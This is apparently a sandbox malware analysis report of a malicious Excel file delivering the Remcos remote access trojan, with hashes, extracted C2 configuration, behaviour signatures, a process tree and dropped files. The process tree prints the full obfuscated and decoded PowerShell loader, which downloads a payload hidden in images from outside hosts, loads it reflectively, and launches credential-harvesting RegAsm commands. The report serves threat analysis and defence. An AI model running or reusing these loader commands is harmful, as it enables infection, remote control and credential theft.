Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    26-03-2024 06:54

General

  • Target

    1.xla.xls

  • Size

    49KB

  • MD5

    1620224d6efdc7d009b64899a6a67626

  • SHA1

    aa99049bcb8caaac23c7c3a9488b47435ce524ec

  • SHA256

    d1836e6e0661938656d0d8883daa624f59b4a0885cd663be712bfa88a5ccea19

  • SHA512

    88720b9050af39543b21ca51f4771b7b9afecbc7db697fb0116208d2ea18ea290d6b6304ced66d8d602b07cf13664fd4715b0816bd0d93a352c69a275d6600a5

  • SSDEEP

    768:fXyBP0IZ3ovboGfJlETRro0LPpeTQMjpHJDQ/QxLEC65:fX68OPwUTRrnp2hjFJDREC

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

107.172.31.178:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-NVSJ5U

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • NirSoft MailPassView 3 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 3 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 9 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Abuses OpenXML format to download file from external location
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1.xla.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1592
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2984
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\pixelcreatedforkissinglove.vbs"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:692
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreEMDgTreTQBSDgTreEsDgTreLwBtDgTreHIDgTreawDgTrevDgTreHDgTreDgTrecDgTreBtDgTreGEDgTreeDgTreDgTrevDgTreDYDgTreMQDgTreyDgTreC4DgTreMwDgTrexDgTreDEDgTreLgDgTre1DgTreDcDgTreMQDgTreuDgTreDcDgTreMDgTreDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBLDgTreFIDgTreTQBDDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1412
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMRK/mrk/ppmax/612.311.571.701//:ptth' , '1' , 'C:\ProgramData\' , 'KRMC','RegAsm',''))} }"
            4⤵
            • Blocklisted process makes network request
            • Adds Run key to start application
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2932
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\KRMC.vbs
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1056
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:1632
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zgyutdriykvtugchaaxi"
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1036
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\jbdeuvckmsnyxnqljlkjvifi"
                6⤵
                • Accesses Microsoft Outlook accounts
                PID:1296
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mdqxuondaafdhbmpawwdxmzzbwi"
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:920

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

      Filesize

      1KB

      MD5

      a266bb7dcc38a562631361bbf61dd11b

      SHA1

      3b1efd3a66ea28b16697394703a72ca340a05bd5

      SHA256

      df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

      SHA512

      0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      13368e9212e10aecd8074997c21887fc

      SHA1

      c225f024c16c5ace29126649f8bcad602ec8e9b8

      SHA256

      e6fe54242ca664b58f2312279d5dfd5668aac411b194d206988a20b676415488

      SHA512

      5632b7cef510f9999beea5505d55e570e8eb0b5a676b776f9c5725f3871ee715631328538f2381e5d5d511cd0e4fdaf730d25576edd2c6ab1289bee9ce69fc9d

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      0e350d7aec763ee80bef16f56f0c4394

      SHA1

      6f7df908342bbf7e4f9b452cbad3b9ea07240455

      SHA256

      8adb205708e6dbd6e36a1a9c23584bb8a9998d032915bb83dc31ee25caa5d673

      SHA512

      850dc31604dc1d8917d9bd93792329665896cb9e2f2214e54aeaf1edf83d68bbff188b7bc9b961147e6d84cb0d329ce2ec1e558e53e3612d5b64e2be377c5fcc

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

      Filesize

      242B

      MD5

      a605ec172fff75be11b7a7cea64d9b1f

      SHA1

      6ed94b4e86c6c83ffac85f91660e8a564c6ea066

      SHA256

      e085e03447780fce290c3b4180737840f666aa6f95f6b11c8c1f6974be1d72cf

      SHA512

      6996c89d2a421bf3d3253607b04468fea85e6824a966cf31e321ce55745e70d9058b1185f6b88d99435987579490d3670b94f499214677b35fb9966efbe668ea

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{7EF8C05F-4B1C-4C52-BAE0-4AE5EE1CE550}.FSD

      Filesize

      128KB

      MD5

      6591012c283ad796108052e92506379b

      SHA1

      f61e506c8bf3387dba1a91f734c79a1f1766dd63

      SHA256

      281b41565065b42bcbcda2e87e3f73835f29fff148ace8cb518e146fc69120c6

      SHA512

      0c155cb8c769e17732fc3b7de58cd6c91d686f44e3f5f0fce119d8b97834d21f60c898f4751eebcb494d13cd9d12cea960d7d233788ad9c80d163df819a512bd

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      dc26952f1fd031ed3f4acaf0525ea543

      SHA1

      ab973529b9ca7bb5039b0845eb6ab59b01f6e1ec

      SHA256

      4db3d50cb6ec06148b7dc360ae743368d1b530924dc0f982e5cc5c3c023756ee

      SHA512

      e372b24eac78a2646ee853d98f2f91e851f009a23619ea243783cc230ceb78a37941d218cb335872fe3b4ea041d10eeb8747b39f140f42aec4b7bb73dbfd5e89

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{25072E89-4E5A-4C60-85B1-CCCE55637EE8}.FSD

      Filesize

      128KB

      MD5

      2b1c08860d3ca63c8a94b363a6e35e6b

      SHA1

      0b47323e5ceb390ff0b16e93889b8577c632fdbe

      SHA256

      36bd54f4d7b4ce16a43173f587c2fd1110857f81e6bb7ef9aada7a059440e40d

      SHA512

      6980b0c2612208611fb72987c7148e81488a17a6584cde8f7148f86cd738bae8f05ef0b22e14e756d2c993cf55ca8bfba0fc90abdf372a055ff0eaafed027143

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\23EIUNT7\heisagirlwholovedmealotwithoutanyexptationssheisreallyagoodgirlshemybabydear_____itrulylovedherfromthehearbecauseverycutebayb[1].doc

      Filesize

      72KB

      MD5

      1b64a140f23bd235c3c482429cb05065

      SHA1

      141c5ad46db205b08032c22292bef782007fa771

      SHA256

      87394948b0df5b356230dcef42c97b38b2cfa29df166f9cc820b0ff440f491f2

      SHA512

      c9a3cfa93b6edf9644e8eeb2b8f17a6be704d9256c922e3a558e71d82ed752ed3eb9eda4a5739d60712af891929b989a2600151e3ba1e7cde7eaac74cc891b30

    • C:\Users\Admin\AppData\Local\Temp\CabE234.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\TarFDA1.tmp

      Filesize

      171KB

      MD5

      9c0c641c06238516f27941aa1166d427

      SHA1

      64cd549fb8cf014fcd9312aa7a5b023847b6c977

      SHA256

      4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

      SHA512

      936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    • C:\Users\Admin\AppData\Local\Temp\TarFF3D.tmp

      Filesize

      175KB

      MD5

      dd73cead4b93366cf3465c8cd32e2796

      SHA1

      74546226dfe9ceb8184651e920d1dbfb432b314e

      SHA256

      a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

      SHA512

      ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

    • C:\Users\Admin\AppData\Local\Temp\zgyutdriykvtugchaaxi

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

